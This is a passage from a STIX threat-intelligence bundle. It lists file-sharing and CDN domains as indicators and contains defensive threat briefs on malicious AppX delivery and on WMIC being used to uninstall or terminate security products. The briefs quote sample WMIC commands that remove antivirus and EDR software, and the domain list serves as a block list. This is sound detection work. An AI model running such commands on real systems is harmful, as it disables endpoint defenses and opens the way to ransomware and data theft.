      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.net",
      "pattern": "[domain-name:value = 'privatlab.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--006a0cda-c9ae-512b-8181-9dc94fa318e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--2681172f-071b-5f49-9226-230d49a3e925"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d732f8f0-37ae-52cb-b1ab-738976eb85bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: send.exploit.in",
      "pattern": "[domain-name:value = 'send.exploit.in']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--34aeb2cd-0219-527d-90c2-ac3647176758",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--d732f8f0-37ae-52cb-b1ab-738976eb85bb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0a67d371-add4-525d-8b03-d3abac4c7f05",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: sendspace.com",
      "pattern": "[domain-name:value = 'sendspace.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--68d0e5d7-8f5a-50e1-b309-1433c2fe3522",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--0a67d371-add4-525d-8b03-d3abac4c7f05"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6d9a8e74-aceb-534f-9a1e-0d8a31a212ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storage.googleapis.com",
      "pattern": "[domain-name:value = 'storage.googleapis.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--11421a62-3434-5d0e-9c67-9503e34343f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--6d9a8e74-aceb-534f-9a1e-0d8a31a212ea"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c8d4e09b-34b7-565c-aaf4-4e72d2a0fdd8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storjshare.io",
      "pattern": "[domain-name:value = 'storjshare.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3976c23a-45a3-532b-bb65-fa7084e8e26c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--c8d4e09b-34b7-565c-aaf4-4e72d2a0fdd8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ec37c37e-926a-518a-8ee4-b1ef90170ce8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: supabase.co",
      "pattern": "[domain-name:value = 'supabase.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e9aa39a9-0006-5b86-b327-6d1d2346cb01",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--ec37c37e-926a-518a-8ee4-b1ef90170ce8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--36b90777-78e8-5f46-9fe7-4758515da489",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: temp.sh",
      "pattern": "[domain-name:value = 'temp.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f6425c48-c0e9-57aa-b5a1-7fd58c043f8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--36b90777-78e8-5f46-9fe7-4758515da489"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f5f0da08-5fe0-58a6-a6b0-b6536df343d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: transfer.sh",
      "pattern": "[domain-name:value = 'transfer.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8730f78b-a1f6-536e-8e7f-6797a04df290",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--f5f0da08-5fe0-58a6-a6b0-b6536df343d8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ad7326d0-80b9-5cfd-a905-9e71ad83a001",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: trycloudflare.com",
      "pattern": "[domain-name:value = 'trycloudflare.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1907336b-f3eb-5cab-a665-02d4a71c8746",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--ad7326d0-80b9-5cfd-a905-9e71ad83a001"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cc52ccc5-215b-5a11-ab5e-67ac75b269d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ufile.io",
      "pattern": "[domain-name:value = 'ufile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--07b6127d-6a47-5ced-a583-710bc3c14002",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--cc52ccc5-215b-5a11-ab5e-67ac75b269d8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f7d7b82f-9316-56db-9581-5a9203c25a39",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: w3spaces.com",
      "pattern": "[domain-name:value = 'w3spaces.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--00292b0a-6584-569c-a640-ef75a3c67784",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--f7d7b82f-9316-56db-9581-5a9203c25a39"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3d5615bd-6c73-5405-a58c-b2c5764907db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: workers.dev",
      "pattern": "[domain-name:value = 'workers.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9713646f-32c4-550d-ab19-5525eb410bec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--3d5615bd-6c73-5405-a58c-b2c5764907db"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bc980337-a15f-5db5-8f3c-a6db22a57780",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: x0.at",
      "pattern": "[domain-name:value = 'x0.at']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:01:35Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--db7eb230-b55b-5929-adff-f5efbc7ba11f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "indicator--bc980337-a15f-5db5-8f3c-a6db22a57780"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--349583cc-8e02-51f3-ac4e-f476c1cfd73b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--92044fff-7f0a-5030-a250-5915eb8bec17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Pre-OS Boot",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1542",
          "url": "https://attack.mitre.org/techniques/T1542"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1f297282-aa45-57f6-9d57-0453aad20de0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "attack-pattern--92044fff-7f0a-5030-a250-5915eb8bec17"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--263909b7-72fa-5795-a8cd-c93f4ea23f79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b3a7bb2e-f20b-5395-b836-b9cacc88404b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote AppX Package Downloaded from File Sharing or CDN Domain",
      "description": "## Overview\n\nThis threat brief focuses on the detection of Windows AppX packages that are downloaded from suspicious file-sharing or Content Delivery Network (CDN) domains. This technique is actively leveraged by various threat actors, including those behind BazarLoader campaigns, to bypass security controls and deliver malware. Starting as early as late 2021, adversaries have been observed abusing legitimate Windows mechanisms, such as the `AppInstaller.exe` utility and the `appxdeployment-server` service, to install malicious applications. The delivery typically involves phishing attacks leading to the download of `.appinstaller` or `.appx` files hosted on platforms like Discord's CDN, GitHub, or various file-sharing services. This method allows threat actors to distribute payloads discreetly, often bypassing traditional perimeter defenses and leading to initial access for further exploitation, data exfiltration, or ransomware deployment.\n\n## Attack Chain\n\n1.  **Initial Access**: A user receives a phishing email containing a malicious attachment, often a compressed archive (e.g., `.iso` or `.zip` file) impersonating a legitimate document or software update.\n2.  **Execution - Malicious Loader**: The user opens the attachment, which contains a shortcut (`.lnk`) or a script that, when executed, triggers a download or execution process.\n3.  **AppInstaller Abuse**: The malicious loader initiates `AppInstaller.exe` to process a specially crafted `.appinstaller` file, bypassing typical security prompts for unsigned applications.\n4.  **Ingress Tool Transfer**: `AppInstaller.exe`, utilizing the `appxdeployment-server` service, downloads a malicious `.appx` or `.msix` package from a remote file-sharing or CDN domain (e.g., `cdn.discordapp.com`, `githubusercontent.com`, `storage.googleapis.com`).\n5.  **Execution - Malware Deployment**: The downloaded AppX package is installed and then executes an embedded malicious payload, such as a loader for BazarLoader, IcedID, or other infostealers.\n6.  **Command and Control (C2)**: The deployed malware establishes persistence on the compromised system and communicates with its command and control infrastructure to receive further instructions or download additional modules.\n7.  **Impact**: The attacker proceeds with post-exploitation activities, including reconnaissance, privilege escalation, lateral movement, data exfiltration, or the deployment of ransomware.\n\n## Impact\n\nSuccessful exploitation allows threat actors to gain initial access to target systems, often bypassing standard application security measures and leading to significant consequences. Campaigns leveraging this technique, such as those deploying BazarLoader, have been observed across various sectors globally. The primary impact includes system compromise, execution of arbitrary code, installation of further malware (e.g., ransomware, infostealers, banking trojans), and potential data exfiltration. This can result in severe financial losses, operational disruption, and reputational damage for affected organizations.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Remote AppX Package Downloaded from File Sharing or CDN Domain\" to your SIEM system to detect suspicious AppX package downloads from untrusted domains.\n*   Ensure `appxdeployment-server` logs are being collected from all Windows endpoints and forwarded to your SIEM for analysis.\n*   Block the domains listed in the IOC section at your network perimeter (e.g., DNS resolver, firewall) to prevent access to known malicious AppX package hosting locations.\n*   Implement strong email filtering and user awareness training to reduce the success rate of phishing attempts that serve as the initial access vector for such attacks.\n*   Restrict the ability of non-administrative users to install applications via `AppInstaller.exe` or AppX packages where possible.\n",
      "published": "2026-07-03T15:01:35Z",
      "labels": [
        "appx",
        "malware",
        "initial-access",
        "stealth",
        "windows"
      ],
      "object_refs": [
        "indicator--2964a832-32d9-5a89-bb63-c62595fed05f",
        "indicator--20c627cf-69e1-5b7d-8409-fb112f44702b",
        "indicator--796b9f27-f775-5409-8a2c-092bed1bf69c",
        "indicator--2bbcb387-8abd-5e10-af87-7a1972f5ea79",
        "indicator--dbd0231f-a7c7-5fc2-9a91-34642cb8d570",
        "indicator--80aa4676-5d20-5c0b-81b6-bf07848fc6f0",
        "indicator--ef761d3a-8fb0-53be-9d53-4bdb1f117e4c",
        "indicator--342cd2b7-67d4-57e7-b552-c6f3129f2883",
        "indicator--d4302876-0fc7-528e-a0ac-fdb6fa386961",
        "indicator--3f408fbc-4329-51a0-befb-e522aed9dce7",
        "indicator--7ddabda8-c4c5-544a-8b0d-b7eef324efe0",
        "indicator--0c3adba0-0fcb-5314-89b0-3304b9d5b87c",
        "indicator--2f59bf6a-8948-5193-9b61-f85275db0b03",
        "indicator--fa673742-cf10-5561-a401-30cfe87e9c3e",
        "indicator--1ee7bfb4-e31e-53ba-9bf2-a96b35e13e1d",
        "indicator--18371ee7-7927-5153-aeb0-9ea6f0be1728",
        "indicator--4fb047b3-5fac-5a1f-ad17-1674b876f078",
        "indicator--592448c3-2451-5522-b29d-05ad7a193325",
        "indicator--c7c9a0dc-d0cf-5197-8a41-475c4c9f4480",
        "indicator--4a9ad7c3-9e88-5bdb-a2b7-d78b58b39339",
        "indicator--d02a4654-f1f9-5b95-92bf-d6c379f1b4c1",
        "indicator--6ac8d397-1822-5776-9bac-c3768e2f526a",
        "indicator--2681172f-071b-5f49-9226-230d49a3e925",
        "indicator--d732f8f0-37ae-52cb-b1ab-738976eb85bb",
        "indicator--0a67d371-add4-525d-8b03-d3abac4c7f05",
        "indicator--6d9a8e74-aceb-534f-9a1e-0d8a31a212ea",
        "indicator--c8d4e09b-34b7-565c-aaf4-4e72d2a0fdd8",
        "indicator--ec37c37e-926a-518a-8ee4-b1ef90170ce8",
        "indicator--36b90777-78e8-5f46-9fe7-4758515da489",
        "indicator--f5f0da08-5fe0-58a6-a6b0-b6536df343d8",
        "indicator--ad7326d0-80b9-5cfd-a905-9e71ad83a001",
        "indicator--cc52ccc5-215b-5a11-ab5e-67ac75b269d8",
        "indicator--f7d7b82f-9316-56db-9581-5a9203c25a39",
        "indicator--3d5615bd-6c73-5405-a58c-b2c5764907db",
        "indicator--bc980337-a15f-5db5-8f3c-a6db22a57780",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--92044fff-7f0a-5030-a250-5915eb8bec17",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting"
        },
        {
          "source_name": "reference",
          "url": "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_downloaded_from_file_sharing_domains.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--040aef1d-f301-53dc-baa9-e889df78d76e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ba4321a1-5c02-52cd-9826-287e8dbfa156",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ba4321a1-5c02-52cd-9826-287e8dbfa156",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Tampering With Security Products Via WMIC",
      "description": "## Overview\n\nSince at least 2021, various sophisticated threat actors and ransomware groups, such as IcedID, LockBit 3.0, Vice Society, and UNC2165, have incorporated the Windows Management Instrumentation Command-line (WMIC) utility into their attack chains to disable or uninstall endpoint security products. This technique, highlighted by a SigmaHQ rule updated in 2025, leverages legitimate system administration tools to achieve defense impairment by targeting common antivirus (AV), endpoint detection and response (EDR), and data loss prevention (DLP) solutions. By executing commands like `wmic product call uninstall` or `wmic process call delete` against security product processes, attackers aim to reduce detection capabilities, bypass preventative controls, and clear the path for subsequent malicious activities such as ransomware encryption, data exfiltration, or destructive attacks. This method is effective because WMIC is a living-off-the-land binary (LOLBIN) that is typically present on Windows systems, allowing attackers to blend in with legitimate system activity and complicate detection efforts.\n\n## Attack Chain\n\n1.  **Initial Access**: Threat actors gain an initial foothold, often through methods like phishing campaigns with malicious attachments or exploiting vulnerable internet-facing applications.\n2.  **Execution \u0026 Foothold**: Malware payloads are delivered and executed, establishing persistence and potentially escalating privileges to administrative levels necessary for system modifications.\n3.  **Internal Reconnaissance**: Attackers perform discovery actions to identify installed security products, their process names, and service configurations, often using tools like `tasklist` or WMIC itself.\n4.  **Defense Impairment**: Using WMIC, attackers execute commands to uninstall security products (e.g., `wmic product where name=\"Sophos Anti-Virus\" call uninstall /nointeractive`) or terminate their processes (e.g., `wmic process where \"name like '%carbon%'\" call delete`).\n5.  **Credential Access \u0026 Lateral Movement**: With endpoint defenses weakened or removed, attackers move laterally across the network, escalating privileges and harvesting credentials.\n6.  **Impact**: The final objective is achieved, which typically involves deploying ransomware for encryption, exfiltrating sensitive data, or performing other destructive actions without hindrance from security software.\n\n## Impact\n\nThe successful tampering with or uninstallation of security products through WMIC directly leads to a significant degradation of an organization's defensive posture, leaving endpoints vulnerable to subsequent attacks. Victims may experience undetected ransomware deployment, leading to widespread data encryption and business disruption, as seen in campaigns involving LockBit 3.0 and Vice Society. Furthermore, the lack of active endpoint protection facilitates data exfiltration, intellectual property theft, and long-term network compromise by sophisticated actors like UNC2165. The cost of recovery can be substantial, encompassing system restoration, data recovery, incident response, and reputational damage.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"Potential Tampering With Security Products Via WMIC\" to your SIEM/EDR platform to detect suspicious WMIC activity targeting security products.\n*   Ensure Sysmon process-creation logging is enabled to provide the necessary telemetry for the detection rule.\n*   Implement strong tamper protection features provided by your endpoint security solutions to prevent unauthorized uninstallation or service termination.\n*   Review and baseline legitimate WMIC usage in your environment to reduce false positives for the detection rule, focusing on expected administrative scripts.\n*   Conduct regular security awareness training, emphasizing the risks of phishing and social engineering, as these are common initial access vectors that precede defense impairment.\n",
      "published": "2026-07-03T15:00:25Z",
      "labels": [
        "defense-impairment",
        "tampering",
        "wmic",
        "windows",
        "lolbin"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://twitter.com/cglyer/status/1355171195654709249"
        },
        {
          "source_name": "reference",
          "url": "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/"
        },
        {
          "source_name": "reference",
          "url": "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions"
        },
        {
          "source_name": "reference",
          "url": "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/"
        },
        {
          "source_name": "reference",
          "url": "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--913a8061-6ad2-561d-80c3-35539f8498bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--25646b09-295a-5130-9f2d-2f917c45963a",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--25646b09-295a-5130-9f2d-2f917c45963a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Removal Via Wmic.EXE",
      "description": "## Overview\n\nThis threat brief highlights the use of `wmic.exe` for unauthorized application removal, a common technique employed by adversaries in Windows environments. `wmic.exe` is a legitimate Windows utility for performing administrative tasks, which makes its malicious use harder to detect without specific behavioral analytics. Threat actors often leverage this command-line tool to uninstall security software, endpoint detection and response (EDR) agents, or other critical applications to evade detection, disable security controls, or prepare systems for further compromise, such as ransomware deployment or data exfiltration. The technique enables persistence and facilitates the execution of subsequent attack stages by removing obstacles. This activity is broadly observed across various malicious campaigns and is not attributed to a single threat actor or campaign, rather it's a common post-exploitation action.\n\n## Attack Chain\n\n*(Note: The provided source describes a specific technique for defense evasion, but does not detail a full attack chain from initial access to impact. The following describes where this specific technique typically fits within a broader attack lifecycle.)*\n\n1.  **Initial Access**: An adversary gains initial access to a system, typically through phishing, exploiting a vulnerable service, or using stolen credentials.\n2.  **Execution**: The adversary executes malicious code, often a payload like a remote access Trojan (RAT) or a credential stealer.\n3.  **Defense Evasion (Wmic.exe Uninstallation)**: To hinder detection and response, the adversary uses `wmic.exe` to uninstall security software (e.g., `wmic product where \"name like '%Antivirus%'\" call uninstall`).\n4.  **Credential Access**: With security software disabled, the adversary may proceed to harvest credentials from the compromised system or network.\n5.  **Lateral Movement**: Using acquired credentials, the adversary moves to other systems within the network.\n6.  **Impact**: The adversary achieves their final objective, which could include data exfiltration, encrypting systems for ransomware, or disrupting business operations.\n\n## Impact\n\nThe unauthorized removal of applications, particularly security software, can have severe consequences for an organization. If an attacker successfully uses `wmic.exe` to uninstall critical applications, it can lead to a significant degradation of endpoint security posture, leaving systems vulnerable to further exploitation. This directly enables defense evasion, allowing threat actors to operate undetected for longer periods, escalate privileges, and proceed with their objectives such as data theft, ransomware deployment, or complete system compromise. The impact can range from temporary disruption to substantial financial loss due to data breaches, operational downtime, and recovery costs. This technique is observed across various sectors due to its broad applicability.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"Application Removed Via Wmic.EXE\" to your SIEM/EDR to detect suspicious `wmic.exe` uninstallation attempts.\n*   Ensure process creation logging, especially with command-line arguments, is enabled for all Windows endpoints, as this is critical telemetry for the provided Sigma rule.\n*   Investigate any alerts from the \"Application Removed Via Wmic.EXE\" rule immediately, as `wmic.exe` uninstall commands are rarely executed legitimately in enterprise environments by end-users.\n",
      "published": "2026-07-03T14:59:26Z",
      "labels": [
        "defense-evasion",
        "impact",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_uninstall_application.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6b4a3213-f864-50b4-9359-ae490df3076d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--013c69c5-4a80-5eaa-9968-d4f0a135ac26",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--013c69c5-4a80-5eaa-9968-d4f0a135ac26",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Termination Attempt via Wmic.EXE",
      "description": "## Overview\n\nThis brief focuses on the use of the `wmic.exe` utility by adversaries to terminate running processes on a compromised Windows host. This technique, often employed for defense evasion, allows attackers to disable security software, monitoring agents, or other critical applications that might hinder their malicious activities. While the provided Sigma rule specifically targets the `call terminate` functionality of `wmic`, this method has been observed in various campaigns, including ransomware operations like LockFile, which leverage it to ensure unimpeded execution of their payload. The detection aims to alert defenders to suspicious attempts to shut down applications, regardless of the success of the termination, providing an early warning sign of potential hostile intent.\n\n## Impact\n\nThe successful termination of security applications can severely degrade an organization's defense posture, allowing malware to execute without detection, establish persistence, or exfiltrate data. If monitoring tools are disabled, attackers can operate stealthily, prolonging their presence in the environment and increasing the scope of damage. In the context of ransomware, disabling endpoint protection can lead to widespread encryption of critical systems and data, resulting in significant operational disruption, data loss, and financial demands for recovery. The impact can extend to data integrity, system availability, and compliance with regulatory requirements.\n\n## Recommendation\n\n*   Deploy the `Application Termination Attempt via Wmic.EXE` Sigma rule to your SIEM for immediate detection of `wmic.exe` attempting to terminate processes.\n*   Ensure Sysmon process creation logging is enabled on all Windows endpoints to capture `wmic.exe` command-line arguments, which are crucial for this detection rule.\n*   Investigate all alerts generated by the `Application Termination Attempt via Wmic.EXE` rule to differentiate between legitimate administrative actions and malicious activity.\n*   Review endpoint security configurations to ensure robust tamper protection mechanisms are in place that prevent unauthorized termination of security products, even by administrative tools.\n",
      "published": "2026-07-03T14:58:21Z",
      "labels": [
        "defense-evasion",
